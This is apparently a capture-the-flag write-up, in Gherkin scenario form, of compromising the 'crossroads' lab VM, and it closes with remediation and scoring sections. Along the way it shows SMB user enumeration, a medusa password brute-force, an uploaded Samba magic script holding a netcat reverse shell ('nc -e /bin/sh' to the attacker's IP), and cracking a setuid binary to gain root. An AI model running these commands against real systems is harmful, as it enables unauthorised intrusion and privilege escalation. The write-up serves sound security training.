## Version 1.4.1
## language: en

Feature:
  TOE:
    crossroads
  Category:
    Improper Control of Generation of Code ('Code Injection')
  Location:
    192.168.103.4:445/albert
  CWE:
    CWE-509: Replicating Malicious Code (Virus or Worm)
  Rule:
    REQ.041: https://fluidattacks.com/products/rules/list/041
  Goal:
    Get remote connection and root privileges
  Recommendation:
    It’d better implement a mechanism to validate uploaded files and in that
    way verify that they doesn't have malicious code

  Background:
  Hacker's software:
    | <Software name>            | <Version>|
    | Kali Linux                 | 2020.4   |
    | Mozilla Firefox            | 78.3.0   |
    | netcat                     | 1.10     |
    | StegoToolkit               | 1.0      |
    | Nmap                       | 7.91     |
    | Medusa                     | 2.2      |
    | Gobuster                   | 3.0.1    |
    | smbmap                     | 1.0.5    |
    | enum4linux                 | 0.8.9    |

  TOE information:
    Given a .OVA file
    When I saw its extension
    Then I executed it on vimware
    Then I saw that the machine was running debian 10 [evidence](01.png)
    Then I verified which IP was assigned to me by dhcp server with the command
    """
    ip add show vmnet8
    """
    And I got the next result
    """
    vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state
    UNKNOWN group default qlen 1000
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
    inet 192.168.103.1/29 brd 192.168.103.7 scope global vmnet8
    valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fec0:8/64 scope link
    valid_lft forever preferred_lft forever
    """
    And I scanned the network using nmap with the next command
    """
    nmap -sP 192.168.103.0/29
    """
    And I got the next result
    """
    Nmap scan report for 192.168.103.1
    Host is up (0.00076s latency).
    Nmap scan report for 192.168.103.4
    Host is up (0.00043s latency).
    """
    Then I knew that 192.168.103.4 was the target machine's IP address
    And I used nmap again to know which ports were opened with the command
    """
    nmap -A 192.168.103.4
    """
    And I got the next result
    """
    PORT    STATE SERVICE     VERSION
    80/tcp  open  http        Apache httpd 2.4.38 ((Debian))
    | http-robots.txt: 1 disallowed entry
    |_/crossroads.png
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: 12 Step Treatment Center | Crossroads Centre Antigua
    139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
    Service Info: Host: CROSSROADS
    Host script results:
    |_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
    |_nbstat: NetBIOS name: CROSSROADS, NetBIOS user: <unknown>,
    NetBIOS MAC: <unknown> (unknown)
    | smb-os-discovery:
    |   OS: Windows 6.1 (Samba 4.9.5-Debian)
    |   Computer name: crossroads
    |   NetBIOS computer name: CROSSROADS\x00
    |   Domain name: \x00
    |   FQDN: crossroads
    |_  System time: 2021-03-23T11:00:32-05:00
    | smb-security-mode:
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode:
    |   2.02:
    |_    Message signing enabled but not required
    | smb2-time:
    |   date: 2021-03-23T16:00:32
    |_  start_date: N/A
    """
    Then I noted that port 80 was used by HTTP with apache 2.4.38
    And NETBIOS-SSN was used on ports 139 and 445 with Samba smbd

  Scenario: Normal use case
    Given HTTP was working on port 80
    Then I accessed to the main webpage on 192.168.103.4:80 using browser
    And thus I could see the webpage as it's shown in [evidence](02.png)

  Scenario: Static detection
    Given I didn't have access to the source code
    Then I couldn't do this detection

  Scenario: Dynamic detection
    Given I didn't found out any wrong
    When I was analyzing the web server
    Then I decided to search possible hidden directories with gobuster
    Then I executed the below command
    """
    gobuster dir -u http://192.168.103.4/-w /usr/share/seclists/Discovery/
    Web-Content/raft-large-words.txt -x php,txt,html -s 200,204,301,302,307,401
    """
    And thus I got the next output
    """
    ===============================================================
    Gobuster v3.1.0
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://192.168.103.4/
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/
    raft-large-words.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.1.0
    [+] Extensions:              html,php,txt
    [+] Timeout:                 10s
    ===============================================================
    2021/03/23 12:09:57 Starting gobuster
    ===============================================================
    /index.html (Status: 200)
    /. (Status: 200)
    /robots.txt (Status: 200)
    /note.txt (Status: 200)
    ===============================================================
    2021/03/23 12:11:28 Finished
    ===============================================================
    """
    When I analyzed the results
    Then I inspected the note.txt file
    And thus I found the following hint [evidence](03.png)
    Then I accessed to the robots.txt
    And I discovered another hidden file [evidence](04.png)
    Then I inspected that file [evidence](05.png)
    And I analyzed it  with StegoToolkit but I didn't found any hidden message
    Then I scanned ports 139 and 445 with smbmap
    And thus I got the results below
    """
    IP: 192.168.103.4:445
    print$     NO ACCESS
    smbshare   NO ACCESS
    IPC$       NO ACCESS
    IP: 192.168.103.4:139
    print$     NO ACCESS
    smbshare   NO ACCESS
    IPC$       NO ACCESS
    """
    Then I noted that I couldn't access
    Then I scanned with enum4linux to find more information about that
    And thus I discovered the relevant information below
    """
     ==============================
    |    Users on 192.168.103.4    |
    ==============================
    index:0x1 RID: 0x3e9 acb:0x00000010 Account:albert
    user:[albert] rid:[0x3e9]
    [+] Found domain(s):
    [+] CROSSROADS
    [+] Builtin
    [+] Password Info for Domain: CROSSROADS
    [+] Minimum password length: 5
    [+] Password history length: None
    [+] Maximum password age: 37 days 6 hours 21 minutes
    [+] Password Complexity Flags: 000000
    S-1-5-21-198007098-3908253677-2746664996-501 CROSSROADS\nobody (Local User)
    S-1-5-21-198007098-3908253677-2746664996-513 CROSSROADS\None (Domain Group)
    S-1-5-21-198007098-3908253677-2746664996-1001 CROSSROADS\albert(Local User)
    """
    Then I used albert to log me with smbclient but it request me a password
    Then I used medusa to crack the password with the next command
    """
    medusa -h 192.168.103.4 -t 16 -u albert -P rockyou.txt -M smbnt -f -v 5
    """
    And thus I could get the password for that user [evidence](06.png)
    Then I authenticated me with that password
    And I could access to the following files
    """
    smb: \> ls
    .                                   D        0  Sat Mar  6 07:45:15 2021
    ..                                  D        0  Tue Mar  2 17:00:47 2021
    smbshare                            D        0  Wed Mar 24 11:39:35 2021
    crossroads.png                      N  1583196  Tue Mar  2 17:34:03 2021
    beroot                              N    16664  Tue Mar  2 18:02:41 2021
    user.txt                            N     1805  Sun Jan  3 12:56:19 2021
    """
    Then I downloaded those files
    Then I saw the user.txt file
    And there I found the first flag [evidence](07.png)
    Then I visualized the crossroads.png file
    And thus I noted that it was the same image that I'd downloaded previously
    Then I compared both files
    """
    -rw-r--r-- 1 kaldar-1 kaldar-1 1.6M Mar 24 11:55 crossroads.png
    -rw-r--r-- 1 kaldar-1 kaldar-1 1.1M Mar 25 10:00 crossroads_pre.png
    """
    And in that way I realized that the size was different
    Then I analyzed the image with StegoToolkit
    And thus I found out an embedded file which seemed a word list
    Then I inspected beroot file but I couldn't execute it in my machine
    Then I accessed to the smbshare directory
    And there I saw the following file
    """
    smb: \smbshare\> ls
    .                                   D        0  Wed Mar 24 11:39:35 2021
    ..                                  D        0  Sat Mar  6 07:45:15 2021
    smb.conf                            N     8779  Tue Mar  2 17:14:54 2021
    """
    Then I inspected that file
    And there I found the next things interesting
    """
    [smbshare]
    path = /home/albert/smbshare
    valid users = albert
    browsable = yes
    writable = yes
    read only = no
    magic script = smbscript.sh
    guest ok = no
    """
    Then I noted that the smbscript.sh was executed
    Then I created a script with the same name
    And there I added the following command
    """
    nc -e /bin/sh 192.168.103.1 1234
    """
    Then I put the port 1234 in listening mode using netcat

  Scenario: Exploitation
    Given previously I'd put the port 1234 in listening mode
    Then I uploaded the script created previously
    And thus I could get remote connection [evidence](08.png)
    Then I listed the files in the directory
    """
    ls -l
    total 1576
    -rwsr-xr-x 1 root   root     16664 Mar  2 17:02 beroot
    -rw-r--r-- 1 albert albert 1583196 Mar  2 16:34 crossroads.png
    drwxrwxrwx 2 albert albert    4096 Mar 24 13:39 smbshare
    -r-x------ 1 albert albert    1805 Jan  3 11:56 user.txt
    """
    Then I noted that beroot had a setuid permission enable
    Then I executed it
    And I looked that it was requesting a password
    """
    enter password for root
    -----------------------
    """
    Then I knew that I had to use the word list found previously
    Then I created a script to crack the password using that word list
    Then I executed the script [evidence](rdanilud.sh)
    And thus I cracked the password [evidence](09.png)
    Then I listed the files one more time
    """
    -rwsr-xr-x 1 root   root     16664 Mar  2 17:02 beroot
    -rw-r--r-- 1 albert albert 1583196 Mar  2 16:34 crossroads.png
    -rwxr--r-- 1 albert albert  363321 Mar 24 17:30 DATA.lst
    -rw-rw-rw- 1 albert albert      75 Mar 25 09:38 out.log
    -rwxr--r-- 1 albert albert     224 Mar 25 09:37 rdanilud.sh
    -rw-rw-rw- 1 root   albert      20 Mar 25 09:38 rootcreds
    drwxrwxrwx 2 albert albert    4096 Mar 25 09:32 smbshare
    -r-x------ 1 albert albert    1805 Jan  3 11:56 user.txt
    """
    Then I visualized the rootcreds file
    """
    cat rootcreds
    root
    ___drifting___
    """
    And there I found the password for the root user
    Then I logged me with that password as the root user
    Then I accessed to the root directory
    And there I listed the files
    Then I visualized the flag and solved the challenge [evidence](10.png)

  Scenario: Remediation
    Given the system vulnerable to a remote code execution attack
    And it doesn't validate that the uploaded files don't have malicious code
    And the passwords are too weak
    Then it'd better verify that the uploaded file doesn't have malicious code
    And establish good password policies to have strong passwords

  Scenario: Scoring
   Base: Attributes that are constants over time and organizations
    8.2/10 (High) - AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H/
   Temporal: Attributes that measure the exploit's popularity and fixability
     8.0/10 (High) - E:H/RL:O/RC:C/
   Environmental: Unique and relevant attributes to a specific user environment
     7.8/10 (High) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found until date 2021-03-25
